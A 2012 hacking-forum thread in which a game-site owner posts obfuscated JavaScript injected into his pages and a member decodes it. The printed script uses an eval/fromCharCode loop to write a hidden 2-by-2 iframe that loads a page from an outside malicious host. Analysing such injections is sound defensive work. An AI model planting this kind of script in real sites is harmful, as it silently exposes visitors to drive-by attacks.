Follow us on Twitter!
Never in the field of human conflict was so much owed by so many to so few. - Winston Churchill
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 23
Guests Online: 22
Members Online: 1

Registered Members: 82832
Newest Member: SerMSYS
Latest Articles
View Thread

HellBound Hackers | Computer General | Webmasters Lounge

Author

Website Hacked. Worth a look.

The-Scarecrow
Member



Posts: 167
Location: Australia
Joined: 18.05.07
Rank:
Newbie
Posted on 15-07-12 09:57
Hey guys I run a small website dedicated to a game, anyway I noticed some code had been injected onto each of my main pages, has anyone seen this code before or identify what it does? It took out my forums and messed a little with my CSS, but no serious damage.

Anyway something that I came across that I thought may also interest you.

Code
<script>try{asdwqe();}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="104.90.800.999.792.1053.872.909.880.1044.368.1071.912.945.928.909.320.351.480.945.816.1026.776.981.808.288.920.1026.792.549.272.936.928.1044.896.522.376.423.824.1035.856.909.960.459.384.414.840.990.376.945.880.414.792.927.840.567.448.306.256.990.776.981.808.549.272.756.952.945.928.1044.808.1026.272.288.920.891.912.999.864.972.840.990.824.549.272.873.936.1044.888.306.256.918.912.873.872.909.784.999.912.900.808.1026.488.306.880.999.272.288.776.972.840.927.880.549.272.891.808.990.928.909.912.306.256.936.808.945.824.936.928.549.272.450.272.288.952.945.800.1044.832.549.272.450.272.558.480.423.840.918.912.873.872.909.496.351.328.531.104.90".split(".");h=2;s="";if(window.document)for(i=0;-158+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h)+8));}e(s);}}</script>





img518.imageshack.us/img518/1368/userbar619616sw2.gif
Ask me for it ill give it.
Author

RE: Website Hacked. Worth a look.

stranac
Member



Posts: 149
Location:
Joined: 15.11.08
Rank:
God
Posted on 15-07-12 21:39
It calls eval on this string:
Code
"\r\ndocument.write('<iframe src=\"http://gskex30.in/in.cgi?8\" name=\"Twitter\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height=\"2\" width=\"2\"></iframe>');\r\n"





The relevant code is within the last catch block:
Code

// e = eval
e = window["eva"+"l"];

// the encrypted string
n = "104.90.800.999.792.1053.872.909.880.1044.368.1071.912.945.928.909.320.351.480.945.816.1026.776.981.808.288.920.1026.792.549.272.936.928.1044.896.522.376.423.824.1035.856.909.960.459.384.414.840.990.376.945.880.414.792.927.840.567.448.306.256.990.776.981.808.549.272.756.952.945.928.1044.808.1026.272.288.920.891.912.999.864.972.840.990.824.549.272.873.936.1044.888.306.256.918.912.873.872.909.784.999.912.900.808.1026.488.306.880.999.272.288.776.972.840.927.880.549.272.891.808.990.928.909.912.306.256.936.808.945.824.936.928.549.272.450.272.288.952.945.800.1044.832.549.272.450.272.558.480.423.840.918.912.873.872.909.496.351.328.531.104.90".split(".");
h = 2;
s = "";

if (window.document)
    // decrypt the string
    for (i=0; -158+i<0; i=1+i) {
        k = i;
        // String[f] is actually String.fromCharCode
        // f was set in the first catch block
        s = s + String[f](n[k] / (i % (h) + 8));
    }

// eval the string
e(s);



Author

RE: Website Hacked. Worth a look.

The-Scarecrow
Member



Posts: 167
Location: Australia
Joined: 18.05.07
Rank:
Newbie
Posted on 16-07-12 03:23
So whats it do? and how would they have gotten it into my index page?

Sorry I cannot code very well.


img518.imageshack.us/img518/1368/userbar619616sw2.gif
Ask me for it ill give it.
Author

RE: Website Hacked. Worth a look.

stranac
Member



Posts: 149
Location:
Joined: 15.11.08
Rank:
God
Posted on 16-07-12 10:14
It writes this iframe to your site:
Code
<iframe src="http://gskex30.in/in.cgi?8" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>




If you don't know what an iframe is, google it.

As to how they got it into the site, all I can say for sure is, they took advantage of a vulnerability in your code.
Author

RE: Website Hacked. Worth a look.

buddywithgol
Member



Posts: 84
Location: behind tor
Joined: 08.01.12
Rank:
Newbie
Warn Level: 30
Posted on 23-07-12 21:20
you need to patch it, dude. otherwise other hacker could exploits this vurnabilityGrin


all good thing must come to an end, aka your computer.


www.imagenesanimadas.net/Informatica/Virus/virus10.gif
www.h4xer.com